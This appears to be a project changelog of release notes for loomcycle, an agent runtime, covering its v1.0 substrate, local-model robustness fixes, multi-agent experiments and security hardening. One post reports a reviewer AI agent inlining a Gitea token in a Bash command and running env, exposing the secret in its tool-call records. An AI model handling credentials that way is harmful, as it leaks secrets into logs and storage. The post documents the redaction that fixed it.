landed (#510 Phase 1, #511 Phase 2a, #512 Phase 2b, #513 Phase 3 breaking, #514 Phase 4 Web UI, #515 Phase 5 cross-transport). @loomcycle/[email protected] publishes to npm on the v1.1.0 tag; the Python adapter ([email protected]) ships on a separate python-v0.9.0 tag. The Paca conversation surfaced what loomcycle was missing; the substrate caught up.
2026-06-16 · release · ~11 min read

loomcycle 1.0 is here. Substrate complete. What's next.

Two months from a JobEmber.ai VPS that ran out of memory at 3-5 parallel claude --print agents to a feature-complete agentic runtime. v1.0 ships today. The substrate is done: six LLM providers plus a deterministic code-js provider, 19 built-in tools with Claude Code parity, MCP on both sides, A2A on both sides, multi-replica HA on Postgres LISTEN/NOTIFY (no Redis dep in v1.0), pause/snapshot/resume even mid-run and across instances (RFC X both phases), per-run credentials never reach the agent's view of its credentials map, a redact plugin in the run-loop that scrubs secrets before the model sees them, scheduled autonomous runs, signed inbound webhooks, content-addressed forkable AgentDefs with lineage. Production-grade validation: 8-hour stability soak (1.27M circuits, 3.8M agent runs, 100% completion across 468 waves, zero leaks) plus a 133-minute autonomous run on local Qwen3.6:27b through ollama-local after the v0.34.3 → v0.37.0 robustness pass. Seven reproducible experiments in the repo (exp1 → exp7), each a self-contained directory. Paca integration confirmed: direct agreement with the Paca maintainer (Apache-2.0 AI-native Scrum / Trello / ClickUp alternative, 954 stars). The Paca maintainer is implementing the integration over gRPC - Paca's agent service calls loomcycle's gRPC surface directly to spawn runs, stream events, and route per-task agent credentials. The substrate primitives (Memory, Channel, Schedule, spawn_runs fan-out, per-run credentials, redact plugin) become available to Paca's UI through the same wire shape loomcycle uses for everything else. Post-v1.0 plans (3 named design RFCs): the context-compress plugin (RFC Z Phase 2, LLMLingua-style content compression in the contextplugin chain that ships redact in v1.0); SQL Memory (RFC AA, per-scope SQL databases the runtime hosts for sandboxed agents - closes the Bash + sqlite3 gap); a capability-based memory interface with mem0 as the first MemoryLayer backend (RFC K, 57k ★, Apache-2.0, daily commits - the substrate stops pretending an LLM-extract product is a KV store). Companion projects (4): loomcycle, n8n-nodes-loomcycle (Slim + Full editions, 20 / 24 nodes), claude-code-plugin-loomcycle, and the Paca integration in flight. v1.0 is the first portable, durable, hardened version of the substrate. Everything from here is composition.
2026-06-16 · field report · ~9 min read

133 minutes on a local Qwen, after four fixes

Cloud LLMs are wonderful when you have a credit card and a clean API. Local models are a different proposition. Two days of testing loomcycle on a slow Ollama model surfaced four real bugs in a row, plus a fifth after the first four landed. Bug 1 (v0.34.3): the compaction gauge lied for one turn - lastCtxTokens was only refreshed from a completed provider turn's usage, so Context op=self kept reporting the pre-compaction footprint until the next turn finished. Fixed by refreshing at every compaction site + stamping the footprint below the compaction block. Bug 2 (v0.34.4 → v0.34.5): the Ollama context window was a lie in both directions. Capabilities().MaxContextTokens was hard-coded as 0; the operator-pinned LOOMCYCLE_OLLAMA_LOCAL_NUM_CTX went out as options.num_ctx, capping the window AND reporting it - overriding whatever ollama had loaded. qwen3.6:27b trained for 256K, ollama loads it at 128K via OLLAMA_CONTEXT_LENGTH, but loomcycle was forcing/reporting 32K. Fix reads the actual loaded context from GET /api/ps once the model is in VRAM (ollama publishes context_length only after load); cached per-model, 5-min TTL, 2s probe timeout, gauge-only - never correctness. Bug 3 (v0.34.4): cloud-shaped 60s time-to-first-byte killed cold local models on disk-load + prefill. Fix: ollama-local registration gets its own timeout pair, default 300s/300s, configurable via env. Cloud Ollama keeps cloud defaults. Bug 4 (PR #503, v0.37.0): the deep one. A code-reviewer run's auto-compact "succeeded" but the kept-verbatim tail (20 turns × 5-50KB Read tool results) was 153.8k tokens - still over the 131k window. Compaction folded older history into a 20.4k summary but the tail was bigger than what fit. Next prefill blew the window; run died. Fix: when the provider reports a window, advance the cut forward, folding the OLDEST kept-verbatim turns into the summarized span until the kept tail fits ~half the window. Single irreducible over-budget turn is kept, not dropped to empty; estimate-based budget errs toward keeping LESS (safe direction for slow local prefill cost). Bug 5 (PR #502, v0.37.0): even with the tail-cap, a single iteration could block ~10 min on a slow model call - and the stale-run sweeper reaped the LIVE run as heartbeat_timeout. OnHeartbeat fired only at iteration START; long prefills exceeded the threshold with no pulse. Fix: a 30s run-lifetime heartbeat ticker that pulses for as long as the run goroutine is alive, in ADDITION to per-iteration. The final run: 133 minutes on Qwen3.6:27b through ollama-local, multiple auto-compactions firing correctly, tail-cap keeping every post-compaction request under the 131k window, heartbeat ticker keeping the run alive through every long prefill, gauge reporting honest used_pct after each compaction. No reaper, no failed prefill, no stale gauge. The agent finished its task. Six minor releases shipped in two days: v0.34.3 / v0.34.4 / v0.34.5 / v0.35.0 (model aliases in tier candidates) / v0.36.0 (sandbox introspection) / v0.37.0. Each fix small (a goroutine, a 2s probe, a re-stamp); none touch the wire shape. Plus a new docs/CONFIGURATION.md §6b with the slow-local-model recipe and a focused loomcycle.local-interactive.example.yaml for steering interactive agents on local models.
2026-06-12 · release note · ~10 min read

Claude Code orchestrates, loomcycle executes - a real 10-agent code review through MCP fan-out (exp7, v0.33.0)

Day seven of the operator-via-MCP series - and the cleanest demonstration yet of the architectural shape loomcycle has been driving toward. Claude Code stays the operator and the conversation surface. loomcycle is the side runtime where the actual multi-agent work runs. Topology: a fresh Claude Code session in the jail git-clones loomcycle, then - using its own .claude/agents/code-reviewer.md and .claude/skills/code-review/SKILL.md as the seed - synthesizes a reviewer agent and a code-review skill for loomcycle. One loomcycle import claude-code --from=work/exp7/.claude --write --skills-dest=$PWD/skills later (the RFC C2 importer that maps the .claude/ shape onto loomcycle's content-addressed Defs - AgentDef + SkillDef), the operator makes one MCP call: spawn_runs(N=10, mode=join) (RFC Y, #464, v0.33.0, shipped today) - fanning 10 reviewers across 10 repo slices (internal/api/http, internal/tools/builtin, internal/providers, internal/store, internal/config, internal/snapshot, internal/scheduler, internal/pause, internal/channels, cmd/loomcycle). The reviewers run concurrently inside loomcycle, each parking findings in the Memory tool under user scope as a shared ledger. One more spawn_run wakes a consolidator that reads the ledger, merges 10 slices into one report, and returns. Result: 10/10 slices, 86 files, 35 issues - 1 Critical + 34 Important. The Critical: internal/channels/scheduler.go:81, a time.AfterFunc closure that can fire before the outer LoadOrStore commits → permanent pendCnt leak under sub-millisecond timer drift. Same-day fixes shipped: #462 + #463 resolved the Critical and most of the Important findings within hours. The Important set surfaced seven structural patterns worth naming: an newID() panic on collision (no retry), a ToolCtx goroutine leak when the call exceeds context, a restored paused-runs status mismatch, a memory-quota check-then-write race, a MaxBytesReader OOM vector via inflated Content-Length, an interactive-goroutine semaphore leak on early return, and a Refresher.Stop() deadlock when the producer holds the same mutex. Three runtime findings surfaced by exp7 itself: Glob abs-path matching falls back to substring on relative roots (matches files outside the allowlist); cross-provider fallback drops reasoning_content when the secondary provider doesn't speak the same field; spawn_runs with N=10 against a single Anthropic-OAuth subscription tripped the per-key rate limit, surfacing the need for an operator-level fan-out throttle. The substrate-shaped path means the 10 reviewers run as real loomcycle agents, with scheduler reach, memory durability, OTEL spans, and per-run credential isolation, while Claude Code stays the human-facing operator. The contract between the two systems is the MCP wire surface - narrow, structured, well-defined.
2026-06-12 · release note · ~10 min read

Context compaction for long-running agents - manual, auto, and the agent asking for it itself (v0.32.0)

Yesterday's interactive terminal made it possible to drive a loomcycle agent for hours from the browser. The natural next problem: a multi-hour conversation eventually crowds the model's context window. v0.32.0 ships a context-compaction subsystem with three coordinated triggers around one shared summarizer. Manual: a Compact button in the run terminal header that calls POST /v1/runs/{run_id}/compact - gated to a safe boundary (a live interactive run must be parked at awaiting_input; mid-turn returns 409, same iteration-boundary discipline as F41 cooperative pause and the steering work's drainSteer). Auto: at the top of each iteration, when the prompt footprint crosses a per-agent autocompact_at_pct threshold (50..95, off by default), the loop summarizes inline and replaces - debounced by a +1-iteration guard, skipped when the window is unknown (Ollama). Self: a new Context op=compact tool that an agent can call itself, looking at its own context usage via the augmented Context op=self, which now reports a context object - {used_tokens, max_tokens, used_pct} alongside the resolved compaction settings - so an agent's prompt can include "if context.used_pct ≥ compaction.autocompact_at_pct → call op=compact now." The compacted form is pinned task + summary + last-N, not brutal drop-everything: a CompactionSplit helper snaps the cut to a clean user-turn boundary so a tool_use/tool_results pair is never split. Per-agent settings (enabled, target_percentage 10..50, keep_last_n, keep_first, autocompact_at_pct 50..95, model - a cheaper summary model) round-trip through every AgentDef mirror, content-identifying. The asymmetric design choice: compaction settings flow DOWN the spawn tree (unlike memory/sampling which are each agent's own) - a parent that needs aggressive compaction wants its fan-out children compacted too. Precedence: per-spawn override on Agent.spawn > parent's effective policy > child def's own settings, recursive across grandchildren. Durable: persisted EventContextCompaction marker means replayTranscript rebuilds the compacted form on crash-recovery / resume / continuation; OTEL adds a context.compaction span event. Plus bundled UI polish: a "✕ Stop" button restyled white-on-dark-red so the destructive cancel reads at a glance, and a Claude-Desktop-style composer card for the terminal input. The substrate now manages context-window pressure as a first-class concern, with the agent able to participate in the decision rather than just bumping into the wall.
2026-06-11 · release note · ~10 min read

An interactive terminal in the Web UI - steer your agents mid-run, Claude-Code-style (v0.26 → v0.29)

Open the Web UI, navigate to /run, pick an agent, type a prompt. The agent streams back into a terminal. You can type a new instruction while it's still working and it shows up as the next user turn before the model's next call. You can answer its Yes/No questions inline. You can close the page, come back two hours later, and the run is still alive. The substrate becomes a development surface. Four headline mechanisms shipped at v0.26.0: (1) Mid-run steering - POST /v1/runs/{run_id}/input + a new internal/steer per-run registry (depth-16 buffered channel mirroring the cancel registry), with a drainSteer hook that pulls queued messages at the top of each iteration - never between a tool_use assistant turn and its tool_results (that orphans the tool_use and 400s the provider). (2) Persistent interactive runs that park at end_turn emitting EventAwaitingInput instead of terminating; paired with per-agent unbounded_iterations (lifts the 16-iteration soft-cap for LLM agents; keeps the 1<<20 hard ceiling as a runaway backstop; cancel becomes the stop). (3) Inline interruption answers - the agent's Interruption.ask becomes an inline prompt instead of bouncing the operator to a separate inbox. (4) The terminal itself - always-on prompt that routes by state (steer while running, continue between turns). v0.26.1 added cross-replica steering (a SteerCoordinator mirroring the cancel coordinator's shape). v0.27.0 made interactive runs survive a view-switch - the loop now runs under context.WithoutCancel(r.Context()) (keeps auth principal + tenant but drops cancel-on-disconnect), persists to the store, and a new GET /v1/runs/{id}/stream endpoint replays from ?from_seq then live-tails. v0.29.0 (today) polishes the terminal: user-message echo (the operator's prompt is finally visible in the live transcript - was being filtered out as a persisted event); a context-size gauge in the header (47.2k / 200k tokens, amber > 70%, red > 90%) computing the true prompt footprint as input + cache_read + cache_creation tokens; agent editor sampling controls (temperature, top_p, top_k, frequency_penalty, presence_penalty, seed, stop) + advanced JSON/YAML overlay box; soft-reclaim of retired agent names; Context op=self reports the resolved provider + model (per-iteration so mid-run fallback shows truthfully). The substrate becomes a development surface, not just a production runtime - and codifies the "parked run, woken by external event" contract that self-evolving agents (exp6.5) and agent ensembles (exp5) both build on.
2026-06-11 · release note · ~13 min read · updated 2026-06-16 with exp6.8 (the GA on local Ollama models)

Self-evolving agents - genes that drive real temperature, an experiment that snapshots mid-run and resumes on another instance, and a local-model rerun that names the model-class wall (exp6 + exp6.5 + exp6.8, v0.25 → v0.37)

A genetic algorithm over forkable AgentDefs, run in three iterations across loomcycle's substrate. exp6 (static v0.25.2 + fully-dynamic v0.26.2, the F40 fix that let a runtime-authored meta-agent fork) was prompt-only evolution: three integer genes (creativity, courage, caution) baked as literal text into each solver's system_prompt and inherited via AgentDef.fork + parent_def_id lineage. exp6.5 closes the experiment cleanly across v0.28.0 → v0.30.0, with all three previously-open gaps now fixed. (1) Per-agent model tunings (#447, v0.28.0) make AgentDef.sampling a real fork-overlay field - the creativity gene now sets sampling.temperature = round(creativity/10, 2), so a gene mutation actually changes the model's sampling, not just prompt text. Real evolution, not pretend. (2) F41 fixed (#446, v0.28.0, RFC X Phase 1): cooperative pause now parks in-flight sub-runs at iteration boundaries and gates new POST /v1/runs with HTTP 503 during the quiesce window. (3) F42 fixed (#456, v0.30.0, RFC X Phase 2): cross-instance resume of snapshotted mid-runs. ResumePausedRuns reconstructs a paused run's loop from its restored transcript and re-enters loop.Run under the same run_id. The killer demo: pause the breeder mid-MUTATE (gen 2 half-seeded, 91 transcript events captured as a paused_runs row), wipe the DB, restore on a fresh loomcycle instance - and the re-dispatched breeder finishes its work autonomously with no external driver, seeding the remaining variants from where it was parked. The experiment continues to completion: 5 generations, mean climbing 0.763 → 0.865, winner at best_score: 0.91 with sampling.temperature: 0.8 (the temperature gene survived the mid-run restore). Cross-instance lineage proven across the mid-run boundary: a gen-2 variant forged on the fresh instance by the re-dispatched breeder has parent_def_id = a gen-1 def that existed only in the file. Pause/snapshot truly anytime. The first experiment in the series that needed no new substrate primitives - and now the first portable experiment artifact that survives a mid-run boundary, a DB wipe, and resumes autonomously on a clean machine. Extended 2026-06-16 with exp6.8: the same GA rerun on a local gemma4:max solver population with cloud-sonnet meta-agents (breeder + advisor). The substrate works flawlessly across 5 generations - per-agent sampling.temperature reaches ollama on every fork, Agent.parallel_spawn dispatches cleanly, the v0.37 robustness (heartbeat ticker + compaction tail-cap + 300s local timeouts) keeps the long slow run alive. A local model as breeder does NOT work (qwen3.6:max mis-formatted the parallel_spawn argument as a JSON string and terminated its turn early; 80-step orchestration is beyond a local small model's structured-tool-call reliability). Honest finding: the GA completes but the population mean stays flat - ~35% of variant-slots produce no usable score because gemma4:max silently skips the structured self-report ~20% of the time and hallucinates ~15%. The winner is real; the population is not converging because most of the population isn't reporting. The substrate is the constant; the small-model reliability ceiling is the variable. exp6.8 is the experiment that surfaces the model-class wall honestly, with the loomcycle substrate as the measuring instrument.
2026-06-10 · release note · ~10 min read

Agent ensembles arrive - scheduler-driven fan-out, Channel.await fan-in, and a clock for agents (RFC S, v0.25)

Experiment 5 in the operator-via-MCP series - and the first one to own the term agent ensemble. A scheduler-driven news-digest pipeline runs as a real ensemble: 5 RSS collectors (HN, Wired, Engadget, Ars Technica, TechCrunch) fire in parallel by cron, each pings a fan-in channel via the scheduler's on_complete hook, a consolidator scheduled 1 minute later calls the new Channel.await {channels, mode: at_least, n: 5, wait_ms: 120s} combinator to wait for all five (or a clean timeout), URL-dedup across 25 items, single Telegram digest as output. End-to-end on both static and fully-dynamic variants (every entity created at runtime via REST) with zero workarounds. The v0.25 "agentic-ensemble" release ships RFC S - three primitives the substrate had been missing: Context op=time (closes F34 - agents finally have a clock; no more shelling to Bash date for cycle bucketing), Channel.await with a symmetric Channel.broadcast fan-out (closes F35 - the missing fan-in combinator across N channels, with any/all/at_least_n modes and wait_ms bound), and schedule max_fires (closes F36 - a schedule self-retires after N fires, no external watcher needed). Three follow-up fixes each surfaced by exp5 itself, all shipped within 24 hours: #422 F37 (scheduler on_complete publish honors channel's declared scope - fan-in channels can be properly scope: global again), #424 F38 (scheduled runs resolve agent in def's tenant - unblocks the fully-dynamic ensemble), #426 F39 (dynamic stdio MCP env interpolation - unblocks the runtime-registered Telegram MCP). Companion change: every prior experiment (exp1-exp4) now ships as a self-contained directory under loomcycle/examples - each carries its own loomcycle.yaml, run.sh, .env.local.example template, and reproducible README; Anthropic-OAuth-primary with a DeepSeek fallback. The substrate is now ensemble-shaped, not just agent-shaped.
2026-06-08 · release note · ~10 min read

The day the reviewer agent inlined the Gitea token in a Bash command - and v0.23.4 redacted it anyway

Day four of the operator-via-MCP experiment series. Real Gitea on the tailnet, real third-party MCP (gitea-mcp, 53 tools), real Telegram bot. The closed-loop dev workflow runs end-to-end un-bridged: the coder agent opens a real PR, a Gitea pull_request webhook auto-spawns the reviewer with the full signed payload, the reviewer merges, a second webhook spawns the advisor, Telegram lights up. Every entity created at runtime by v0.23.5 - no static yaml. The headline moment came mid-merge: the reviewer agent inlined the resolved GITEA_TOKEN literally in a Bash command and then ran env for good measure. The token is now in two distinct tool-call records. Pre-v0.23.4 = persisted plaintext in SQLite. v0.23.4 (#407) ships value-based redaction at rest: the runtime matches the resolved secret string against persistence-bound payloads and replaces every occurrence with [redacted:<env-var-name>], preserving the env-var name for debuggability. Whole-DB scan after the run: 0 literal token hits, 0 webhook-secret hits, 32 env-var-name references. The redaction is value-based - so an agent assigning the token to a differently-named shell var (GITEA_TOKEN=... instead of LOOMCYCLE_GITEA_TOKEN) is caught anyway. Plus three supporting fixes that made the fully-dynamic version of this workflow possible: #403 webhook → dynamic agent via tenant stamping, #405 gated dynamic stdio MCP with token-safe env mapping, #409 dynamic MCP tools advertised at run start. Store names, never values - and enforce it value-based so the agent's typo doesn't undo your discipline.
2026-06-07 · release note · ~9 min read

Multi-agent refine loop, 0.92 → 0.98 in 5 hops - and the silent default-deny that almost made it look like the agents weren't talking

Day three of the operator-via-MCP series. Three agents iterating "What is recursion?" over Channels + Memory + Evaluation - answerer, evaluator, aggregator. Five hops, scores climbed 0.92 → 0.98, winner: "A mirror facing a mirror - each reflection a smaller twin of the last, until there's nothing left to reflect." The convergence is satisfying; the interesting part is everything we had to fix to make the loop run cleanly. Five bugs the runtime should have warned about at boot: (1) F21 - every Memory op was silently refused because agents lacked memory_scopes; default-deny was correct, default-silent-deny was a footgun - #389 boot-warns the family (Memory/Evaluation/Channel/Interruption). (2) F18 - spawn_run user_id was being silently overridden to "default" under the legacy LOOMCYCLE_AUTH_TOKEN path because RFC L's applyPrincipal minted a fixed placeholder principal; #388 honors wire user_id for legacy principals while keeping the strict override for real OperatorTokenDef principals. (3) F20 - channeldef CRUD lived only in REST; #395 adds the meta-tool with create/delete/purge across MCP/gRPC/TS. (4) F22 - Channel.subscribe wait_ms was silently capped; #390 warns on truncation. (5) F29 - runtime-substrate channels weren't usable for pub/sub because the per-run policy only saw yaml channels; #404 merges the runtime channel store into the policy. The fully-dynamic re-run on v0.23.3 (all three agents and three channels created at runtime, zero yaml) completes the loop cleanly. Default-deny is right. Default-silent-deny is a footgun.
2026-06-06 · release note · ~9 min read

The MCP server wedged the IDE on a list - head-of-line blocking, and why killing the process was the only release (RFC O/P/R)

Day two of the operator-via-MCP series. Mid-experiment, the operator's IDE (Claude Code over the loomcycle plugin's stdio MCP) hung on a list_runs tool confirmation. They approved the call. Nothing happened. Killing the loomcycle mcp process from another terminal was the only release. Why does a cheap list hang for tens of minutes? Source-reading v0.22.0's internal/api/mcp/server.go found a single load-bearing footnote: "Frames are dispatched SEQUENTIALLY... Concurrent tools/call is a v0.9.x optimisation" - not implemented. Combined with an unbounded spawn_run handler (no per-call timeout), one slow run blocked every subsequent frame, even cheap reads, even cancel_run. Classic head-of-line blocking on a single-consumer stream. Three amplifiers turned "slow" into "wedged for an hour": F15 cross-runtime interruption wake (the run held for the 1h interruption timeout), provider outage stalls (Opus 4.7/4.8 incident the same day), and accumulated SSE/resource pressure. Three coordinated fixes in v0.23.0 close the failure class at three levels: RFC O (#377) makes stdio dispatch concurrent on bounded goroutines; RFC P (#380) wraps spawn_run in a transport timeout; RFC R (#381) ships the thin-client topology (loomcycle mcp --upstream <runtime>) that dissolves the cross-process coordination problem entirely. Breaking change in the same release: loomcycle mcp --no-http removed - the pattern that needed it caused F15. A "we'll fix it later" comment on a load-bearing concurrency property is a P1 bug, not a roadmap item.
2026-06-05 · release note · ~8 min read

We drove a fresh Claude Code session as the operator - and the first experiment found a DeepSeek bug we'd shipped without noticing

Day one of a four-experiment series. To pressure-test loomcycle from the outside, we set up an isolated sandbox, installed the brew binary, and drove it through a fresh Claude Code session as the operator - talking to loomcycle over MCP, with no internal shortcuts. Every experiment designed in advance by us; every step executed by Claude through the same tool surface a community operator would see. The smallest test first: can a coding agent actually use the built-in tools the operator enabled? Yes - but the first run died at Bash{mkdir -p exp1}. mkdir returns empty stdout. Loomcycle's openai-compat adapter was dropping content on tool-result messages when the content was empty, and DeepSeek's API requires it (every other provider tolerated the omission). 400 mid-conversation, loop dead. F10 - fixed in v0.23.0 (#379, RFC Q): always serialize content on tool messages. Run 2 passed cleanly - independent verification confirmed exactly the first 100 primes, 0 mismatches, first/last 2/541. Plus the second experiment (Interruption Yes/No gating, PASS) surfaced F15 - cross-runtime interruption wake fails silently because the bus is in-process. v0.23.0's thin-client topology (RFC R) dissolves the cross-process pattern that triggered it. Provider-adapter correctness is load-bearing in a way unit tests miss - every other provider tolerated the missing field, so the bug had been invisible against Anthropic / OpenAI / Gemini.
2026-06-04 · production story · ~10 min read

Collapsing four hallucinating LLM orchestrators into zero tokens - and the two bugs the migration found

JobEmber.ai's agentic pipeline had four batch orchestrators - each one taking some list of N items, fanning out N LLM worker agents in parallel, optionally reducing the workers' outputs. The orchestration work was deterministic. Partition a list. Chunk a slice. Wrap each item in a worker prompt. Spawn N children. Collect results. Yet one of them - job-search-batch - was running as an LLM agent burning ~8,000 tokens per run, and the weak-tier model occasionally hallucinated its own routing logic and serialized the workers it was supposed to fan out (violating the "FIRE ALL N SPAWNS IN ONE ITERATION" system-prompt instruction). v0.20.0's inline code_body ingestion made the right fix viable: replace all four with deterministic code-js agents. Zero tokens for the orchestration layer. No hallucination. One run-id to monitor + cancel as a unit (vs N orphan promises from a TS Promise.allSettled). Scheduler-fireable. The migration surfaced two latent loomcycle bugs the LLM-orchestrator path had been hiding - both shipped in v0.21.0. (1) The code-js wall-clock budget was 120 seconds, CPU-sized for a JS body that runs to completion, but a fan-out orchestrator parks for minutes in Agent.parallel_spawn waiting for LLM children; resume turns started over-budget and the runtime interrupted the next interruptible bytecode, surfacing as code_agent_threw at an innocent source line (loomcycle #359). Fix: distinct code_agent_timeout error class + per-agent run_timeout_seconds + per-run override. (2) The Go map[string]any → JS object conversion (rt.ToValue) walked the map in Go's deliberately-randomized iteration order, so the same input.metadata produced JS objects with different key order on each replay turn. An agent that does JSON.stringify(input.metadata.matches) emitted byte-different bytes turn-1 vs replay → spurious code_agent_replay_divergence (loomcycle #366). Fix: stableJSValue() recursively materializes every map as a JS object with sorted keys. Note: LOOMCYCLE_CODE_AGENTS_DETERMINISTIC=1 pins only RNG seed + clock anchor - it did not fix this. The pattern worth taking forward: if a step in your agentic pipeline can be expressed as a 30-line deterministic function, it should not be an LLM agent.
2026-06-03 · release note · ~9 min read

Code agents without a host filesystem - JS bodies through the substrate (v0.19.0 + v0.20.0)

Code-as-agent (RFC J, v0.16.0) shipped JS bodies as agent_code/<name>/index.js on the loomcycle sidecar's disk. That host-FS dependency was fine for local dev and a single VPS - but it didn't survive three deployment shapes operators were already running: cloud (no host filesystem to bind), container orchestration (bind-mounting kills "docker pull && run" portability), and n8n interactive (workflow authors define agents at design time and never touch the sidecar's disk). v0.19.0 (#349 + follow-up #350) threads inline code_body through AgentDef as a hash-significant content field - versioned, content-addressed, snapshot-portable, gated by the existing LOOMCYCLE_CODE_AGENTS_ENABLED switch with a 256 KB cap. Empty body omitempty's out of canonicalization, so every existing non-code agent hashes byte-for-byte identical - zero upgrade churn. Plus three review-fixes worth naming: boot-fatal validation now accepts inline bodies (the headline no-FS-bind case had been failing log.Fatalf), per-turn disk read regression closed on the FS path (a replay-N-turns code-agent had been re-reading + re-hashing index.js on every Provider.Call), and a three-way hash drift between substrate / .md-discovery / loomcycle hash agent CLI was resolved - once code_body became hash-significant, three producers had three different definitions of "content," and operator verify would silently disagree with create. v0.20.0 lights up the Web UI (#351 - Library renders code_body as a monospace block; create/fork modal grows a code textarea for provider:code-js), ships the typed ensureCodeAgent + 0.20.0 ensureMcpServer.discoveredToolCount sugar (#353), and closes a sibling MCPServerDef asymmetry: #352 folds tools/list into create at ingestion (no v2, no separate manual rediscover; best-effort, promote-gated, size-guarded). Same static-vs-dynamic asymmetry class as yesterday's post - this round closes it on the code-agent side.
2026-06-02 · release note · ~9 min read

We inverted a startup race - and found four static-vs-dynamic asymmetries to close

A live failure on 2026-06-02 in JobEmber.ai's cv/cl-adapter agent traced back to a static mcp_servers.jobs: block in loomcycle.yaml that created a chicken-or-egg between the loomcycle sidecar and the MCP-providing web service. The fix direction was obvious - invert the dependency, let the MCP-providing service register its own MCPServerDef dynamically when it's already live. The fix itself surfaced four distinct static-vs-dynamic asymmetries the substrate had silently been hiding because every previous consumer stuck to the static path. (1) create only checked the public host allowlist, not the private one (#340). (2) The lazy tool resolver consulted only the static yaml map - dynamic tools were callable via the pool but not resolvable at dispatch (#341); the fix consolidated through the shared lookup.MCPServer orphan-with-zero-callers (#345). (3) Every consumer restart minted a new MCPServerDef version (one lineage hit 19 in days); SHA-dedup landed server-side + typed ensureMcpServer sugar in TS client 0.18.0 (#343 + #344). (4) The most subtle: ${LOOMCYCLE_*} inside a header was flattened at config.Load on the yaml path; the dynamic path bypassed config.Load entirely, the request-time substituter's lazy .*? fallback regex truncated on the inner }, and loomcycle sent literal Bearer ${LOOMCYCLE_…} upstream - hard 401 (#348). Plus two bonus close-outs on the same asymmetry class: dynamic tools now advertise in the per-run catalog (#347), static yaml schedules now bootstrap into the sweeper's due-query (#346). The discipline going forward: when a substrate primitive has both a yaml-loaded and a dynamically-created path, every seam between substrate and runtime must work the same on both - or the side nobody exercises silently rots.
2026-06-02 · release note · ~10 min read

Multi-tenant authorization shipped - and the four bugs adversarial QA caught before v0.17.0

v0.17.0 ships RFC L: the seventh substrate primitive (OperatorTokenDef), an authoritative {tenant_id, subject, scopes} principal resolved from the bearer instead of the wire, per-route + per-RPC scope enforcement, a tenant-scoped read boundary across the API and Web UI, and a role-aware workspace with super-admin tenant focus. The feature shipped clean across three PRs (substrate + identity threading + token cache). Then adversarial QA went looking - and found four authorization gaps the feature PRs missed. One CRITICAL: the gRPC interceptor authenticated but never scope-checked, so any narrow token could mint substrate:admin tokens. Three HIGH: cross-principal session continuation trusted session-id-as-secret, retiring the last admin silently dropped into open-mode (fail-OPEN), and the per-route scope map had typos that left mutating routes ungated. All four closed with regression-grade tests before tag. The lesson worth keeping: authentication is the easy half; authorization needs a second pass. v1.0 reframes from "RFC L is the v1.0 capstone" to a pure hardening + distribution milestone.
2026-06-01 · release note · ~8 min read

n8n Cloud's scanner - and why @loomcycle/n8n-nodes-loomcycle now ships in two editions

v3.0.0 of @loomcycle/n8n-nodes-loomcycle splits into Slim (14 nodes, zero runtime dependencies, n8n-Cloud-verified) and Full (18 nodes, self-hosted only, includes the AI-Agent Tool cluster sub-nodes plus SSE triggers plus the Wait-for-Completion op). The forcing function was n8n Cloud's @n8n/scan-community-package scanner: bans @langchain/core, every timer primitive (setTimeout / setInterval / node:timers / globalThis / process), console, and non-(n8n-workflow) peer deps. Our value-add cluster sub-nodes (Memory Tool, Channel Tool, Sub-Agent Tool, MCP Server Tool) were built on langchain's tool-supply API - no path to a single package that kept them and passed the scanner. The engineering punchline: the LoomCycle Chat Model migrated off @langchain/core to @n8n/ai-node-sdk, deleting the BindTools / RunnableBinding / synthetic-tool-call-id workarounds the previous post documented. ~200 lines of compensation code, gone. Scanner constraints are constraints with intent.
2026-05-31 · release note · ~9 min read

Code as agent - and the design we replaced before shipping

v0.16 shipped RFC J: provider: code-js runs operator-authored JavaScript via goja as a first-class agent. Same loop, OTEL spans, scheduler / webhook / A2A reachability, sub-agent composition - at zero token cost. The engineering core of the release is that we built it twice. The first design (PR #306 - parked-goroutine continuations with state held across Provider.Call invocations) worked, integration-tested clean, and had three honest concerns that wouldn't go away: it held state where every other provider was stateless, depended on a goja issue for cancel semantics, and wasn't resumable across restart. PR #307 superseded it with the stateless replay model. Each Call builds a fresh goja runtime, fast-forwards through the run's transcript (which IS the durable memoization log), stops at the first un-recorded tool call. The transcript already exists; no parallel state machine; resumable across restart and replica for free. Ambient determinism (per-run-seeded Math.random, anchored Date.now) makes replay divergence-free by construction. Suspend/resume becomes symmetric because nothing is held across the loop's dispatch gap.
2026-05-31 · release note · ~7 min read

Two memory interfaces - flat KV and the layered paradigm honest about its shape

v0.15 shipped a flat memory Backend interface with native ranking, search-time dedup, and Mem9 as the first external implementation. v0.16 ships MemoryLayer alongside it - a separate optional capability for LLM-extract memory products like mem0, Zep, and Mem9 smart-mode. The forcing function was the RFC K product survey: every mature memory product turned out to be paradigm-mismatched against the flat-KV contract. Mem9's live v1alpha2 API refuted our stub-tested wire shape point by point (write takes messages not a caller key; server-assigned UUID identity; 202 Accepted async ingest; no Stats). The fix wasn't swapping Mem9 for mem0 - every LLM-extract product hits the same paradigm trap. Two interfaces is the honest answer; Mem9 demoted to PREVIEW and re-targeted at MemoryLayer, which is its actual paradigm. Interfaces lie when they advertise more than they support.
2026-05-30 · release note · ~7 min read

Input webhooks - the signed-by-default front door for external events

RFC H shipped in v0.14.1. WebhookDef is the fifth substrate primitive after AgentDef / SkillDef / MCPServerDef / ScheduleDef - external systems (GitHub, Stripe, Linear, n8n) sign and POST an event to /v1/_webhooks/{name}, and loomcycle either spawns an agent run (delivery: spawn) or wakes a parked agent through a channel (delivery: channel). HMAC-SHA256 over the raw body with three envelopes auto-detected, two-layer idempotency (in-memory cache + durable runs.idempotency_key), strict JSONPath payload projection, never-silently-degrade error contract. The engineering core of the release is two trust-boundary bugs the whole-feature review caught: a dedup cache that recorded delivery_id at the guard step (silently dropping legitimate sender retries as replays) and a mapped payload field marked trusted-text instead of untrusted-block (bypassing the loop's prompt-injection fence). Both would have been silent in production; both got regression-grade tests on the fix.
2026-05-30 · release note · ~6 min read

Loomcycle speaks A2A - server, client, and the INPUT_REQUIRED bridge that wasn't supposed to ship

